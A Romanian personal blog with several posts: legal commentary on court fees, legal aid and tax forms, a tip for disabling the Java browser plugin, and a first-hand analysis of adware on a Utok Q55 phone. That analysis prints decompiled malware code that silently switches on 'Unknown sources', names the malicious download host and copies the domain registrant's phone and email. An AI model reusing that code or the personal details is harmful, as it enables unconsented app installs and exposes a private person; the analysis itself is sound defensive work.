Pățanii cu Android…


La începutul anului Cristiana a primit cadou un telefon Utok Q55. Ieftin, chinezesc, românesc… – dar are niște specificații bunicele. În fine, în continuare nu-mi propun o recenzie a lui, ci să povestesc din pățaniile de securitate prin care am trecut.

Primele simptome

Acum câteva luni, din senin, ne-am trezit cu aplicații care s-au instalat singure (un fel de joc cu „bubbles”, Hola Launcher, Apus Launcher). Le-am dezinstalat, dar au reapărut după un timp.
Am șters apk-urile (cu nume aleatorii) găsite fie în stocare internă, fie în SD card. Am pus setarea Unknown sources la No.
După câteva zile, surpriză: aplicațiile pe care le scosesem se reinstalau, iar setarea Unknown sources era pusă pe Yes.

Tot în aceeași perioadă Secure Net de la Vodafone tot trimitea mesaje că a blocat descărcarea de conținut periculos.

Reparația capitală

După ce am stăruit un pic pe lângă cei de la Utok să publice pe sait stock ROM-ul pentru modelul Q55 (cam într-o săptămână au remediat problema), am trecut la reinstalarea software-ului.
Lucrurile au mers bine până când în primele minute după reinstalare a reapărut din senin joculețul cu „bubbles”.
Am șters disperat SD cardul și am reinstalat software-ul din nou (cam ca pe vremurile bune, cu Windows XP…).

Problema nu a reapărut, însă în perioada următoare mai veneau sporadic mesaje de la Secure Net și cam în fiecare dimineață dezactivam setarea Unknown sources (pe care o regăseam mereu activată).

My Recent Apps

Agresiunea launcherelor (Hola și Apus) și a bulelor a fost înlocuită de agresiunea unei aplicații obscure numită My Recent Apps (am păstrat apk-ul, pentru curioși), care apărea din senin după deblocarea ecranului.

Noua reparație capitală

Am găsit pe saitul Utok o versiune și mai recentă a ROM-ului (UTOK_Q55_sw_24.03.2016_RO) și am instalat-o cu gândul că poate rezolvă problema de securitate legată de activarea automată a setării Unknown sources. Bineînțeles că nu. Zilnic o dezactivez și degeaba.

Pe firul lăsat de Secure Net

Două mesaje de la Vodafone Secure Net îmi stârnesc curiozitatea și încep să merg un pic pe fir.
Textul sună așa: Fisierul accesat in 23May16 h12:18 la http://www.lichtw.com/uploadPath/20160519135835.ja este periculos si a fost blocat de Secure Net. Detalii pe http://www.vodafone.ro/securenet. Adresa indicată nu returnează nimic, dar dacă schimb extensia din .ja în .jar, se descarcă ceva de acolo.

Extrag conținutul arhivei .jar (în fond .apk este tot o arhivă .jar) și găsesc classes.dex și META-INF.

Decompilez classes.dex online, apoi offline cu o unealtă interesantă (JADX). Rezultă vreo 158 de clase Java, cu nume scurte, „obfuscate”. Nu înțeleg mare lucru de acolo, însă totuși dau peste a.java în care găsesc niște lucruri.

De pildă, variabile sau metode cu denumiri suspecte:

private Date hookworm;
private Date idolatrous;
private Context mContext;
private double mediatory;
private int sallied;
private int tsimshian;

public static String getLibUID() {
   return "20160519135832PERIODONTIST";
}

public static String getLibVer() {
   return "20160519135832MILLIFARAD";
}

ifxejqk(1129790026);
if (!bInput) {
   bInput = true;
   try {
       at atVar = new at();
       ensureApkInstallSecurity(context);
   } catch (Exception e) {
        Arrays.asList(new String[]{"xmdemhyx", "kqlimxum", "mbpmtinx"});
        e.printStackTrace();
   }
   try {
        bm.f().a(context, mGlobalId, getLibVer());
   } catch (Exception e2) {
        String str = "autoplagiarism";

și o metodă:

private static boolean ensureApkInstallSecurity(Context context) {
return Secure.getInt(context.getContentResolver(), "install_non_market_apps", 0) == 0 ? Secure.putInt(context.getContentResolver(), "install_non_market_apps", 1) : true;
}

Îmi amintesc că am mai citit despre „how to programmatically change unknown sources” și apărea în discuții setarea install_non_market_apps. Se pare că ensureApkInstallSecurity() face exact ce mă enerva pe mine: verifică starea Unknown sources și o activează, dacă nu este deja activată, lăsând apoi loc etapei următoare a infecției – descărcarea locală a unui apk și instalarea lui fără acordul utilizatorului.

Chinezăria trage la China

Mă întorc la adresa de unde ceva de pe telefon încerca să descarce arhiva .jar: www.lichtw.com
Pagina inițială nu afișează nimic.
O căutare whois dă ceva amănunte:

Registrant Contact
Name: zhang xing
Organization: zxsunland
Mailing Address: beijing, beijing beijing 10000 CN
Phone: +86.15136111307
Ext:
Fax:
Fax Ext:
Email: zhangsheng0831@gmail.com

Se pare că emailul celui ce a făcut înregistrarea domeniului este folosit și la o mulțime de alte domenii cu nume dubioase.

Foarte interesant! Ceva din software-ul chinezăriei caută „noutăți” înapoi acasă.
Îmi pot închipui că nimic din ce a văzut telefonul ăsta nu a scăpat de ochi străini? Îmi pot…

Sper că Utok repară vulnerabilitatea asta înainte să fie nevoie să rezolv problema apelând la ANPC sau la instanțe.

Actualizare: (25.07.2016) problemele descrise în articol au fost rezolvate prin instalarea versiunii UTOK-Q55-sw-EU-v09, descărcată de pe utok.ro.

Președintele tuturor românilor?!


Aud frecvent vorbindu-se despre ce va face cutare dacă va fi „președintele tuturor românilor” sau ce ar trebui să facă cel despre care se crede că îndeplinește această funcție.
Vestea proastă este că acest președinte al tuturor românilor nu există. Este o noțiune fără conținut legal. Funcția, așa cum scrie în carte, este de președinte al României, nu al românilor.
„Președinte al (tuturor) românilor” sună ca un titlu monarhic. Într-o republică. De pildă, Napoleon a fost încoronat Empereur des Français”, împărat al francezilor, nu al Franței, după cum și unii regi de dinaintea lui (și după) s-au intitulat „regi ai francilor” apoi „regi ai francezilor”. Împărații germani au purtat multă vreme titlul de „Romanorum Rex”, „rege al romanilor”, după cum și alte neamuri germanice cunoșteau titluri precum „Rex Wandalorum et Alanorum” sau „Rex Angul-saxonum”. Chiar în zilele noastre avem exemplul unor „monarhi” fără țară (sau număr): împăratul romilor, regele (internațional) al romilor etc.
Un asemenea titlu mă duce cu gândul la o căpetenie a unui grup de oameni de același neam, nu la un conducător constituțional al unei republici contemporane.
De aceea cred că e de preferat să auzim de un președinte al României, nu unul al românilor.
De ce contează? Pentru că puțină precizie nu strică nimănui.

P.S. Admit că momentul publicării acestui text poate fi nefericit. Dacă scrii despre ceea ce nu-ți convine la o expresie precum cea din titlu cu câteva zile înainte de alegerile prezidențiale, s-ar putea să fii puțin bântuit de trolli… (dar de-aia avem moderare)…

Este spitalul public scutit de taxa judiciară de timbru?


Un articol publicat pe juridice.ro, cu referire la vechea lege privind taxele judiciare de timbru, indica în ce condiții a apreciat Înalta Curte de Casație și Justiție că este aplicabilă scutirea de taxă în cazul spitalelor publice. Decizia civilă nr. 3465/2012 a Î.C.C.J. stabilea că un spital public, parte într-un litigiu comercial (deși hotărârea menționează existența unui contract de achiziție publică, litigiul devenind unul de competența instanței de contencios administrativ, deci nu a secției a II-a civilă), nu este scutit de taxa judiciară de timbru conform art. 17 din Legea nr. 146/1997 privind taxele judiciare de timbru întrucât cererea sa (apel) nu avea ca obiect „venituri publice”, obligația spitalului având la bază raporturile comerciale dintre părți.
În articolul de față verificăm dacă aceeași soluție rămâne de actualitate și sub imperiul O.U.G. nr. 80/2013 privind taxele judiciare de timbru.
Este oportună o prezentare a celor două texte legale:

Legea nr. 146/1997 O.U.G. nr. 80/2013
Art. 17

Sunt scutite de taxa judiciară de timbru cererile și acțiunile, inclusiv căile de atac formulate, potrivit legii, de Senat, Camera Deputaților, Președinția României, Guvernul României, Curtea Constituțională, Curtea de Conturi, Consiliul Legislativ, Avocatul Poporului, de Ministerul Public și de Ministerul Finanțelor, indiferent de obiectul acestora, precum și cele formulate de alte instituții publice, indiferent de calitatea procesuală a acestora, când au ca obiect venituri publice.

Art. 30

(1) Sunt scutite de taxa judiciară de timbru acțiunile și cererile, inclusiv căile de atac formulate, potrivit legii, de Senat, Camera Deputaților, Președinția României, Guvernul României, Curtea Constituțională, Curtea de Conturi, Consiliul Legislativ, Avocatul Poporului, de Ministerul Public și de Ministerul Finanțelor Publice, indiferent de obiectul acestora, precum și cele formulate de alte instituții publice, indiferent de calitatea procesuală a acestora, când au ca obiect venituri publice.

(2) În înțelesul prezentei ordonanțe de urgență, în categoria venituri publice se includ: veniturile bugetului de stat, bugetului asigurărilor sociale de stat, bugetelor locale, bugetelor fondurilor speciale, inclusiv ale bugetului Fondului de asigurări sociale de sănătate, bugetului Trezoreriei Statului, veniturile din rambursări de credite externe și din dobânzi și comisioane derulate prin Trezoreria Statului, precum și veniturile bugetelor instituțiilor publice finanțate integral sau parțial din bugetul de stat, bugetele locale, bugetul asigurărilor sociale de stat și bugetele fondurilor speciale, după caz, veniturile bugetului fondurilor provenite din credite externe contractate ori garantate de stat și ale căror rambursare, dobânzi și alte costuri se asigură din fonduri publice, precum și veniturile bugetului fondurilor externe nerambursabile.

În decizia menționată instanța accentuează asupra condiției „când [cererile] au ca obiect venituri publice”. Apoi, raportându-se la textul art. 188 din Legea nr. 95/2006 privind reforma în domeniul sănătăţii a concluzionat că spitalele publice, finanțându-se integral din venituri proprii, nu sunt scutite de taxa judiciară de timbru.
Se poate observa că legea nouă dă o definiție noțiunii de „venituri publice”, care lipsea în textul legal anterior.
Cu relevanță pentru discuția de față sunt textele marcate în tabelul de mai sus. Pe de-o parte, definiția include bugetul Fondului de asigurări sociale de sănătate (cunoscut și ca F.N.U.A.S.S.) în categoria bugetelor fondurilor speciale, iar pe de altă parte arată că sunt incluse în veniturile publice și „veniturile bugetelor instituțiilor publice finanțate integral sau parțial din (…) bugetele fondurilor speciale”.

Ca atare, ținând cont că finanțarea spitalelor publice se face măcar parțial din contractele de furnizare de servicii medicale încheiate cu casa de asigurări de sănătate (v. art. 189 din Legea nr. 95/2006), deci din F.N.U.A.S.S., veniturile bugetelor acestor instituții publice sunt venituri publice, în sensul legii, pentru acest motiv devenind incidente prevederile referitoare la scutirea de taxă.

Este obligatoriu formularul pentru cererea de acordare a ajutorului public judiciar?


O practică a unor complete de la Judecătoria Craiova impune folosirea unui formular pentru cererile de acordare a ajutorului public judiciar. Se pare că şi alte instanţe folosesc astfel de formulare (ex. Judecătoria Salonta, Tribunalul Arad), chiar dacă nu neapărat identice cu cel regăsit la biroul de copiat acte de la instanţa menţionată.
În acest articol verificăm dacă un asemenea formular are vreun fundament legal.

Ajutorul public judiciar este reglementat în dreptul intern prin O.U.G. nr. 51/2008, act ce transpune Directiva 2003/8. Directiva menţionează la art. 16 două formulare-tip: pentru cererile de asistenţă judiciară şi pentru transmiterea acestor cereri.
Ordonanţa de urgenţă prevede, de asemenea, necesitatea unui formular (v. art. 49 şi anexa).

Problema nu este lămurită.

Formularul din directivă se referă la cererile care se încadrează în domeniul de aplicare al acesteia: „litigiile transfrontaliere, în materie civilă şi comercială indiferent de tipul instanţei” (art. 1-2 din directivă).
Formularul din ordonanţa de urgenţă se referă tot la cereri în contextul stabilit de directivă: „Cererile pentru acordarea ajutorului public judiciar, formulate conform prezentului capitol (…)” (v. art. 49, Capitolul VI – „Reguli speciale privind acordarea ajutorului public judiciar cetăţenilor statelor membre ale Uniunii Europene sau altor persoane care au domiciliul ori reşedinţa obişnuită pe teritoriul unui stat membru şi formularea unei cereri de asistenţă judiciară către un alt stat membru al Uniunii Europene”). Chiar titlul formularului din anexa ordonanţei de urgenţă este clar: „FORMULAR pentru cererea de asistenţă judiciară în alt stat membru al Uniunii Europene”.

Nu există nicio prevedere referitoare la vreun formular pentru cererile subiecţilor legii române, adresate instanţelor din România.

Dacă sunt respectate condiţiile de fond (v. art. 14 din O.U.G. nr. 51/2008 – menţionarea obiectului şi a naturii procesului, a datelor personale ale solicitantului, indicarea stării materiale a acestuia, declaraţia privind ajutorul public judiciar primit în ultimele 12 luni, înscrisurile doveditoare), cererea este valabil întocmită, nefiind necesară sau obligatorie utilizarea vreunui formular.
Sigur, pentru comoditate, solicitantul poate opta pentru expunerea informaţiilor de mai sus şi într-un formular, însă este în afara cadrului legii o amânare a judecăţii doar pe motivul lipsei formularului, cât timp cererea deja depusă îndeplineşte condiţiile stabilite de O.U.G. nr. 51/2008 şi poate fi examinată în privinţa temeiniciei.

Câteva probleme legate de taxele judiciare de timbru


Articolul de faţă nu îşi propune o reiterare a temelor obişnuite în discuţiile despre taxele judiciare de timbru (ex. cuantumul uneori excesiv, alteori ridicol; afectarea dreptului de acces liber la justiţie etc.), ci prezentarea unor probleme punctuale întâlnite în practică şi pentru care ar fi necesară o reglementare mai bună.

1. Litigii privind funcţionarii publici

Legislaţia românească distinge între raportul juridic de serviciu specific funcţionarilor publici şi raportul juridic de muncă aplicabil generic persoanelor angajate. În mod criticabil, printr-o reglementare vagă, Legea nr. 188/1999 privind statutul funcţionarilor publici prevede la art. 117 că dispoziţiile acestei legi se completează cu prevederile legislaţiei muncii, precum şi cu reglementările de drept comun civile, administrative sau penale, după caz, în măsura în care nu contravin legislaţiei specifice funcţiei publice.

Printre prevederile legislaţiei muncii, relevante pentru discuţia de faţă, se află şi scutirea de taxă judiciară de timbru a cererilor în materie de conflicte de muncă (art. 270 din Codul muncii). Scutirea de taxă este prevăzută şi de Legea nr. 146/1997 privind taxele judiciare de timbru, la art. 15 lit. a).

În litigiile legate de raportul de serviciu al funcţionarilor publici se întâlneşte, într-adevăr, o taxă judiciară de timbru calculată după regulile aplicabile în materia contenciosului administrativ: fie 4 lei (art. 3 lit. m) prima liniuţă din Legea nr. 146/1997), fie 10% din valoarea pretinsă, dar nu mai mult de 39 lei (art. 3 lit. m) a doua liniuţă din Legea nr. 146/1997).

Practica este neunitară. Pot fi găsite atât soluţii în care acţiunile sunt scutite de taxa judiciară de timbru (ex. Decizia civilă nr. 4097/2008 a Înaltei Curţi de Casaţie şi Justiţie, Decizia civilă nr. 1223/2009 a Curţii de apel Bacău, Decizia civilă nr. 3230/2009 a Curţii de apel Craiova), cât şi soluţii în care acţiunile sunt supuse taxei judiciare de timbru (ex. Decizia civilă nr. 1919/2008 a Curţii de apel Cluj, Decizia civilă nr. 1678/2008 a Curţii de apel Cluj, Decizia civilă nr. 8/R/2008 a Curţii de apel Galaţi).

Esenţial nu este cuantumul mic al taxei, ci efectul neplăţii ei, de anulare a acţiunii sau a cererii, în cazul în care instanţa interpretează restrictiv legea.

Soluţia problemei poate fi dată printr-un recurs în interesul legii sau, mai bine, prin modificarea Legii nr. 146/1997 în sensul clarificării voinţei legiuitorului. Ar fi preferabilă o soluţie care să aplice un tratament nediscriminatoriu în privinţa timbrajului între funcţionarii publici şi salariaţi.

2. Daune morale

Prin O.G. nr. 11/1998 a fost adăugat un nou caz de scutire de la plata taxei judiciare de timbru (v. art. 15 lit. f1)): acţiunile şi cererile referitoare la stabilirea şi acordarea daunelor morale pentru prejudicii aduse onoarei, demnităţii sau reputaţiei unei persoane fizice (N.B. nu orice fel de daune morale).
Prevederea citată a fost abrogată prin O.G. nr. 34/2001. Cererile respective nu mai erau scutite de taxă.

La opt ani după abrogare, Decizia Curţii Constituţionale nr. 778/2009 declara neconstituţională prevederea abrogatoare din O.G. nr. 34/2001. În termenul de 45 de zile de la publicarea deciziei în Monitorul Oficial actul normativ contestat nu a fost modificat pentru a fi pus în acord cu prevederile Constituţiei, astfel încât dispoziţiile relevante şi-au încetat efectele juridice, potrivit art. 147 alin. (1) din Constituţie. Scutirea de taxă devenea iarăşi operantă (?).

Situaţia este foarte similară cu cea privind abrogarea incriminării insultei şi a calomniei (v. Legea nr. 278/2006), urmată de declararea ca neconstituţională a prevederii abrogatoare (v. Decizia Curţii Constituţionale nr. 62/2007), apoi de menţinerea dezincriminării prin Decizia privind recursul în interesul legii nr. 8/2010 a Înaltei Curţi de Casaţie şi Justiţie, urmată de recenta decizie a Curţii Constituţionale, încă nepublicată, care aparent menţine punctul de vedere al Curţii.

Iarăşi este preferabilă intervenţia autorităţii legislative. Sunt mai multe posibilităţi de rezolvare ce pot fi imaginate: reglementarea expresă a scutirii, stabilirea unei taxe fixe modice care să nu afecteze substanţa dreptului apărat, reglementarea în normele de tehnică legislativă sau în legea Curţii Constituţionale a efectelor pe care le poate avea decizia acestei instanţe prin care se constată că o prevedere abrogatoare este neconstituţională etc.

3. Obligaţii contractuale de întreţinere

O altă prevedere discutabilă a Legii nr. 146/1997 este cea referitoare la scutirea de taxă judiciară de timbru a acţiunilor şi cererilor referitoare la „obligaţiile legale şi contractuale de întreţinere„.

Cu preţul de a sublinia lucruri evidente, obligaţiile contractuale de întreţinere au ca temei un contract de întreţinere. De obicei, contractul de întreţinere se încheie cu titlu oneros între persoane vârstnice care au în proprietate anumite bunuri de valoare (ex. imobile) şi persoane care se obligă să efectueze prestaţii de întreţinere şi îngrijire în schimbul transferului proprietăţii asupra bunurilor celor dintâi.
În ipoteza în care există un contract de întreţinere şi creditorul întreţinerii solicită rezoluţiunea contractului pentru neexecutarea obligaţiilor asumate de debitor, se pune problema timbrării acţiunii.

Tipic, potrivit art. 2 alin. (11) din lege, instanţele stabilesc taxa la valoarea bunurilor ce fac obiectul transferului de proprietate, iar cuantumul taxei este semnificativ în raport cu veniturile celor ce datorează taxa. O interpretare pe care se fundamentează astfel de soluţii ar fi cea prezentată şi în Decizia civilă nr. 707/2011 a Curţii de apel Alba Iulia: cererea de constatare a nulităţii absolute (similar şi pentru rezoluţiune) a unui contract de întreţinere nu se încadrează în categoria „cererilor referitoare la obligaţii contractuale de întreţinere”.
Există, însă, şi semne ale unei practici judiciare care dă eficienţă scutirii de taxă şi în cazul acţiunilor privind rezoluţiunea contractelor de întreţinere (ex. Decizia civilă nr. 23/R/2008 a Curţii de Apel Oradea, Sentinţa civilă nr. 1578/2011 a Judecătoriei Oradea, o sentinţă a Judecătoriei Bârlad).

Această din urmă interpretare pare cea justă, dacă avem în vedere principiul de drept potius ut valeat quam ut pereat (actul, inclusiv cel normativ, trebuie interpretat în sensul aplicării sale, nu al neaplicării), dar şi interpretarea teleologică, după scopul urmărit de legislativ la edictarea normei privind scutirea de taxă.

Acţiunea în rezoluţiune discutată priveşte neîndeplinirea unor obligaţii contractuale de întreţinere. Dacă textul legal privind scutirea de taxă ar fi interpretat ca nereferindu-se şi la astfel de acţiuni, urmarea ar fi lăsarea fără aplicabilitate concretă a prevederii legii. Mai ales în contextul în care contractul de întreţinere nu avea o reglementare proprie în legislaţia anterioară noului Cod civil, cu greu pot fi concepute alte tipuri de acţiune care să privească obligaţii contractuale de întreţinere, dar care să nu includă şi rezoluţiunea contractului de întreţinere.

Cu privire la interpretarea teleologică menţionată, se poate aprecia că prevederea legală a avut ca scop protejarea unor categorii de persoane faţă de o sarcină pecuniară împovărătoare, în condiţiile în care obligaţia de întreţinere, fie legală, fie contractuală, a rezultat dintr-o stare de nevoie a acestora.

Este adevărat că în astfel de ipoteze se pot invoca drept remediu reglementările privind ajutorul public judiciar. În forma lor actuală, însă, acestea oferă numai iluzia ajutorului, prin condiţiile abrupte impuse şi prin necorelarea cuantumului efectiv al taxei cu veniturile solicitantului – ex. venit mediu net pe membru de familie de 300 lei pentru scutire totală sau de 600 lei pentru reducere cu 50% a taxei, indiferent dacă vorbim despre o taxă de 1500 lei sau despre una de 5000 lei.
Chiar dacă ordonanţa de urgenţă prevede la art. 8 alin. (3) că „ajutorul public judiciar se poate acorda şi în alte situaţii proporţional cu nevoile solicitantului”, sunt rare cazurile când se trece de analiza mecanică a încadrării în situaţiile menţionate anterior.

Problema poate primi acelaşi remediu ca şi cea expusă la punctul 1.

4. Plata

Art. 19 din Legea nr. 146/1997 prevede că taxele judiciare de timbru se plătesc în numerar, prin virament sau în sistem on-line, în contul bugetului local al unităţii administrativ-teritoriale în care îşi are domiciliul sau reşedinţa, ori, după caz, sediul fiscal debitorul taxei.
Tot legea prevede că debitorul taxei trebuie să suporte şi costurile operaţiilor de transfer al sumelor datorate ca taxă judiciară de timbru.

În cazul tipic, în litigiile civile reclamantul (sau cel care exercită o cale de atac) trebuie să plătească taxa în contul unităţii administrativ-teritoriale în care are domiciliul sau sediul fiscal. Numai dacă debitorul taxei nu are nici domiciliul, nici reşedinţa, nici sediul în România, taxa urmează a fi plătită în contul bugetului local al unităţii administrativ-teritoriale în care se află sediul instanţei la care se depune acţiunea sau cererea.

Există destule cazuri în care debitorul taxei are domiciliul, reşedinţa sau sediul într-o unitate administrativ-teritorială diferită de cea în care îşi are sediul instanţa.
Practica locală (cel puţin cea de la instanţele pe care le frecventez) este de plată a taxelor judiciare de timbru la casieriile din subordinea Primăriei Craiova, indiferent dacă debitorul taxei are domiciliul în acest oraş sau dacă, de pildă, are sediul în alt judeţ şi formulează un apel la Curtea de apel Craiova.

Chiar pagini de Internet aparţinând Curţii de apel Craiova conţin îndrumări ambigue, lăsând impresia unei opţiuni a plătitorului (exemplu, alt exemplu): „Platitorii pot achita taxele judiciare de timbru atat in evidenta fiscala, cat si la unitatile trezoreriei statului in raza carora acestia sunt luati in evidenta fiscala, cat si la unitatile trezoreriei statului in a caror raza teritoriala se afla sediile instantelor de judecata.”
Alte instanţe (ex. Tribunalul Bucureşti) preiau cuminte şi fidel prevederea legală.

Legea nr. 146/1997 nu prevede vreo sancţiune pentru plata greşită a taxelor sau vreun mecanism de transfer al sumelor greşit încasate. Ar fi excesivă anularea cererii pentru plata într-un cont greşit, după cum tot excesiv ar fi să i se ceară plătitorului să facă demersuri pentru ca unitatea care i-a încasat taxa să o transfere unităţii competente sau să ceară restituirea taxei conform art. 117 alin. (1) lit. d) din Codul de procedură fiscală. Nu este clarificată nici ipoteza în care taxa este plătită de avocatul debitorului, în special, dacă acesta nu a precizat că îşi alege domiciliul la sediul profesional al avocatului.

Dacă legea ar fi aplicată cu stricteţe am putea ajunge la situaţii absurde în care plata unor taxe modice (ex. 2 lei pentru copii de pe hotărârile judecătoreşti, cu menţiunea că sunt definitive sau irevocabile, 1 leu/pagină pentru legalizarea de copii de pe înscrisurile aflate la dosar, pentru fiecare exemplar de copie) ar trebui făcută în contul unei comune aflate la sute de kilometri depărtare de sediul instanţei. Sigur, există posibilitatea plăţii prin virament, însă cât de rezonabilă este plata unui comision de transfer mai mare decât suma transferată? Mai ales în condiţiile în care nu toate unităţile administrativ-teritoriale îşi publică pe Internet informaţii actualizate privind conturile în care se efectuează plăţi…
Chiar şi pentru a încasa bani birocraţia de stat preferă să paseze sarcina găsirii informaţiilor tot către plătitor, deşi ar avea mijloacele tehnice pentru a simplifica operaţiile administrative.

Ideal ar fi un sistem care să permită o dirijare automată a sumelor provenite din taxele judiciare de timbru, în funcţie de informaţiile de înregistrare fiscală. Mai precis, plăţile ar putea fi făcute într-un cont unic, oriunde în ţară, urmând ca sistemul informatic să le vireze automat în contul unităţii administrativ-teritoriale în care este înregistrat fiscal plătitorul.

Fără concluzii.

Completare (08 iulie 2013):
Mă bucur să observ că, exceptând criticile privind plata (punctul 4), toate celelalte probleme discutate au primit o soluţie acceptabilă prin noua reglementare: O.U.G. nr. 80/2013 privind taxele judiciare de timbru.

So, you want to disable Java in your browsers?


Yesterday I read about a new Java 0-day exploit that allows executing arbitrary programs on victim computers just by accessing a Web page, without any confirmation from the users.

I need Java Runtime Environment for a very nice app that I use: Geogebra. This and some Yahoo! Messenger games (like Pool or Backgammon) were the only reasons I still keep JRE installed.
I really don’t need the Java plugin enabled in any browser and for major browsers this shouldn’t be a big issue. There are specific and documented ways for disabling Java.

A pretty tricky problem is that my browser of choice is Maxthon 3 (don’t ask me why) and disabling the Java browser plugin isn’t as easy via UI as in other browsers. Even if Maxthon supports two engines (Chrome and IE), it doesn’t expose advanced options (like about:plugins or about:config in other browsers) that would allow better plugin control.

So, the problem was finding a way to disable the Java plugin in Maxthon (and in my other browsers), but still keep the JRE installed in order to use it for Geogebra.

(Please note that I’m referring to Java, not JavaScript – these are two very different technologies. I’m pointing this out because searching the net for stuff like „how to disable Java in browser” I found quite a lot of results that actually referred to JavaScript. This is not the place to elaborate on the issue.)

The nicest trick I found for solving my problem was (now I’m assuming the reader has some prior knowledge of manipulating the Windows Registry… and that he’s using Windows):
(1) open the Registry Editor;
(2) in HKEY_LOCAL_MACHINE find (CTRL+F) the key named MozillaPlugins (its location varies based on OS architecture – 32/64 bit; ex. in Windows 7 64 bit the location should be HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\);
(3) expand that key, export the keys named like @java.com/*;
(4) delete those java keys.

This single move disabled the Java plugin in Maxthon 3, Firefox 15 and Chrome 18. I didn’t bother for Internet Explorer, since I don’t use it (except for testing some of my Web apps). Note that disabling Java in IE affects the Yahoo! Messenger games mentioned above. Also note that by clicking a Java applet placeholder in Maxthon, even after deleting those registry keys, an empty dialog with two buttons is displayed (when you click on the left button the browser tries to retrieve the plugin from the Web).

After all those changes you might want to test your browser.

This is, of course, a quick and dirty fix for a 0-day situation, not a thorough solution.

Scurtă plimbare prin iadul fiscal românesc – declarația 392B


Citeam că nedepunerea la termen a declarațiilor 392A și 392B se sancționează cu niște amenzi deloc de neglijat. Chiar și baroul are un anunț. Simțindu-mă vizat de obligația de declarare respectivă am urmat un pic firul textelor normative pentru a înțelege mai bine de ce, cum etc.

Am vizitat pagina ANAF indicată și în articol. Am descărcat progrămelul oferit de ANAF (D392_2011). Nu e locul aici să comentez despre programul oferit de ANAF – despre faptul că în universul lor există numai Windows și .exe, că aspectul aplicației trece cu un bocanc sovietic peste orice înseamnă interfață grafică modernă, stil, ergonomie, comportament intuitiv etc.

Am mai navigat pe sait până am ajuns la o pagină din care să descarc și declarația în format PDF – declarația 392B se referă la persoane impozabile neînregistrate în scopuri de TVA și care nu îndeplinesc condițiile de plafon etc. pentru TVA (cazul meu).

Declarația 392B este prevăzută de Ordinul președintelui Agenției Naționale de Administrare Fiscală nr. 1081/2011 pentru aprobarea modelului și conținutului unor formulare de declarații informative (publicat în Monitorul Oficial, Partea I, nr. 103/2011). În anexa la ordin sunt enunțate instrucțiunile de completare. Acolo găsesc câteva noțiuni precum: „Cifra de afaceri”, „Livrări de bunuri și prestări de servicii”, „Jurnalul pentru vânzări”, „Achiziții”, „Jurnalul pentru cumpărări”. Chiar dacă, realist vorbind, nu ne putem aștepta ca legea să aibă precizia unei definiții din matematică, totuși noțiunile utilizate într-un act normativ (unul fiscal!) nu ar trebui să fie deloc vagi, ci suficient de clare încât să permită contribuabilului să își cunoască exact obligațiile și drepturile – v. articolul 3 din Codul fiscal sau considerente din jurisprudența CJUE precum C-143/93 Gebroeders van Es Douane Agenten BV c. Inspecteur der Invoerrechten en Accijnzen, paragraful 27, sau T-115/94 Opel Austria GmbH c. Consiliul Uniunii Europene, paragraful 124; v. și jurisprudența CEDO – Cauza Rotaru contra României, paragraful 55. Așadar, presupunem că fiecare din noțiunile enumerate are o semnificație îndeajuns de clară încât să putem opera cu ea.

Ca avocat neplătitor de TVA și obligat să țin contabilitatea în partidă simplă nu îmi sunt familiare cele două registre contabile din care ar trebui să preiau datele pentru declarația 392B; registrul-jurnal de încasări și plăți este singurul pe care l-am completat până acum. Apropo de reglementarea privind contabilitatea în partidă simplă, în acel ordin din 2004 se fac trimiteri către Hotărârea Guvernului nr. 831/1997 pentru aprobarea modelelor formularelor comune privind activitatea financiară și contabilă…. În prezent acele trimiteri nu mai duc nicăieri întrucât hotărârea de Guvern a fost abrogată în 2009, fără a mai fi prevăzut altceva în loc.

La o căutare pe Internet după „jurnal pentru vânzări” și „jurnal pentru cumpărări” găsesc Ordinul Ministrului Finanțelor Publice nr. 425/1998 (publicat în Monitorul Oficial, Partea I, 391bis/1998).

În acest act normativ cele două jurnale au chiar și coduri: 14-6-12/a (Jurnalul pentru vânzări) și 14-6-17/b (Jurnalul pentru cumpărări). Verific apoi dacă ordinul mai este în vigoare. Se pare că nu. A fost abrogat de Ordinul Ministrului Finanțelor Publice nr. 1850/2004. Și el a fost abrogat – v. Ordinul Ministrului Economiei și Finanțelor nr. 3512/2008 (publicat în Monitorul Oficial, Partea I, nr. 870bis/2008). Abia acesta este actul aflat în vigoare în prezent, fiind modificat prin Ordinul Ministrului Finanțelor Publice nr. 2869/2010. Cele din urmă ordine nu mai au în conținutul lor reglementări referitoare la cele două jurnale buclucașe.

Cu puțin noroc, continuând căutarea pe Internet, găsesc o referire la actul normativ care ar reglementa jurnalele: Ordinul Ministrului Economiei și Finanțelor nr. 1372/2008 (publicat în Monitorul Oficial, Partea I, nr. 364/2008). În mărinimia emitentului, persoanele impozabile sunt lăsate să aprecieze asupra modului în care își vor ține evidența „corectă și completă” (v. în special articolul 1 alineatele (3)-(4) și articolul 2). Textul prevede că persoanele impozabile pot să folosească modelele orientative incluse în anexe. Este limpede că aceste persoane pot la fel de bine să nu folosească niciun fel de evidență de tipul jurnalului pentru vânzări și a celui pentru cumpărări. Își țin evidența în registrul-jurnal de încasări și plăți sau în formă electronică, declară și plătesc impozitele cu grija cetățeanului naiv… Și așa trece timpul până când își mai aduce aminte vreun ministru sau șef al ANAF că din hățișul de declarații și formulare existente deja în circulație parcă lipsește totuși ceva… o informativă care să fie completată folosind date dintr-un registru opțional… Și dă sfară în țară că pentru nedepunerea declarației 392B fiscul va amenda drastic contribuabilii indisciplinați care țineau cu orice preț să eludeze ansamblul coerent, simplu, clar, public și accesibil al reglementărilor fiscale.

Bineînțeles, s-au erodat demult așteptările ca legislația noastră să fie clară și redactată coerent, așa că îmi voi completa declarația folosind datele din registrul-jurnal de încasări și plăți. E un pic mai complicat să clasific în vreo categorie onorariile retrocedate de maestru – reprezintă ele contraprestația unei prestări de servicii? Plata unor taxe/contribuții către barou, CAA, INPPA, bugetul de stat este o „achiziție”? La fel, în lipsa jurnalelor pentru vânzări și cumpărări, e foarte complicat să calculez suma „achizițiilor” de la plătitori de TVA. Nicio problemă, dacă voi greși, fiscul va avea grijă să mă disciplineze pentru declarația care nu ar fi corectă și completă…